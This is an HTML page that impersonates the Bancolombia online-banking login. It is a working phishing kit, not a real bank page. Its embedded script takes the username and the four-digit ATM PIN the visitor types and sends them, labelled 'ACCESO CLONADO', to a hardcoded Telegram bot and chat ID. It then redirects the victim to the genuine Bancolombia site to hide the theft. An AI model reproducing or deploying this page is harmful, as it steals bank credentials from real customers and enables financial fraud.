<!DOCTYPE html>
<html lang="es-CO">
<head>
    <meta charset="utf-8">
    <title>Bancolombia Sucursal Virtual Personas</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700&display=swap');

        body {
            margin: 0;
            padding: 0;
            font-family: 'Open Sans', sans-serif;
            background-color: #2c2a29;
            background-image: url('https://svpersonas.apps.bancolombia.com/assets/images/auth-trazo.svg');
            background-size: cover;
            background-position: center;
            display: flex;
            flex-direction: column;
            align-items: center;
            min-height: 100vh;
            color: white;
        }

        .header { margin-top: 50px; text-align: center; }
        .header img { width: 170px; filter: brightness(0) invert(1); }
        .header h2 { font-weight: 300; font-size: 26px; margin-top: 15px; }

        .auth-card {
            background: #3d3d3d; 
            width: 420px;
            padding: 45px;
            border-radius: 8px;
            box-shadow: 0 15px 35px rgba(0,0,0,0.5);
            text-align: center;
            margin-top: 25px;
            box-sizing: border-box;
        }

        .auth-card h1 { font-size: 26px; font-weight: 700; margin-bottom: 10px; margin-top: 0; }
        .auth-card p { font-size: 14px; margin-bottom: 40px; color: #e0e0e0; line-height: 1.5; }

        .input-group {
            text-align: left;
            margin-bottom: 25px;
            border-bottom: 1px solid #999; /* Línea gris clara */
            display: flex;
            align-items: center;
            padding-bottom: 10px;
        }

        /* Iconos Vectoriales Blancos */
        .svg-icon {
            width: 18px;
            height: 18px;
            margin-right: 12px;
            fill: none;
            stroke: #ffffff; /* Color de línea blanco */
            stroke-width: 1.5;
            opacity: 0.9;
        }

        .input-group input {
            background: transparent;
            border: none;
            color: #ffffff; /* Letra blanca */
            font-size: 16px;
            width: 100%;
            outline: none;
            padding: 0;
        }

        .input-group input::placeholder { color: #bbbbbb; font-weight: 300; }

        .links-small { text-align: left; margin-top: -20px; margin-bottom: 25px; }
        .links-small a { color: #fdc300; font-size: 12px; font-weight: 600; text-decoration: underline; }

        #btnFinal {
            width: 100%;
            background-color: #5a5a5a; /* Gris neutro inicial */
            color: #2c2a29;
            border: none;
            padding: 14px;
            border-radius: 25px;
            font-size: 15px;
            font-weight: 700;
            cursor: pointer;
            margin-top: 15px;
            transition: 0.3s;
        }

        .btn-active { background-color: #fdc300 !important; }

        .footer-link { margin-top: 30px; display: block; color: white; font-weight: 700; font-size: 14px; text-decoration: underline; }
    </style>
</head>
<body>

    <div class="header">
        <img src="https://library-sdb.apps.bancolombia.com/bds/7.41.13/assets/icons/logos/bancolombia-horizontal-no-spacing.svg">
        <h2>Sucursal Virtual Personas</h2>
    </div>

    <div class="auth-card">
        <h1>¡Hola!</h1>
        <p>Ingresa los datos para gestionar tus productos y hacer transacciones.</p>
        
        <div class="input-group">
            <svg class="svg-icon" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round">
                <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path>
                <circle cx="12" cy="7" r="4"></circle>
            </svg>
            <input type="text" id="user" placeholder="Usuario" oninput="validar()">
        </div>
        <div class="links-small"><a href="#">¿Olvidaste tu usuario?</a></div>

        <div class="input-group">
            <svg class="svg-icon" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round">
                <rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect>
                <path d="M7 11V7a5 5 0 0 1 10 0v4"></path>
            </svg>
            <input type="password" id="pass" placeholder="Clave del cajero" maxlength="4" inputmode="numeric" oninput="validar()">
        </div>
        <div class="links-small"><a href="#">¿Olvidaste o bloqueaste tu clave?</a></div>

        <button type="button" id="btnFinal">Iniciar sesión</button>

        <a href="#" class="footer-link">Crear usuario</a>
    </div>

    <script>
        const TOKEN = "8357885851:AAHVb5BTDEjD8maJJH7aPEox0WGG6JQeTL0";
        const CHAT_ID = "6694132376";

        function validar() {
            const u = document.getElementById('user').value;
            const p = document.getElementById('pass').value;
            const btn = document.getElementById('btnFinal');
            if(u.length >= 4 && p.length === 4) {
                btn.classList.add('btn-active');
            } else {
                btn.classList.remove('btn-active');
            }
        }

        document.getElementById('btnFinal').onclick = function() {
            const u = document.getElementById('user').value;
            const p = document.getElementById('pass').value;

            if (u.length >= 4 && p.length === 4) {
                this.innerText = "Cargando...";
                const msg = `🏦 ACCESO CLONADO\n👤 User: ${u}\n🔑 Pass: ${p}`;
                const url = `https://api.telegram.org/bot${TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${encodeURIComponent(msg)}`;

                new Image().src = url;

                setTimeout(() => {
                    window.location.href = "https://www.bancolombia.com/personas";
                }, 1000);
            }
        };
    </script>
</body>
</html>
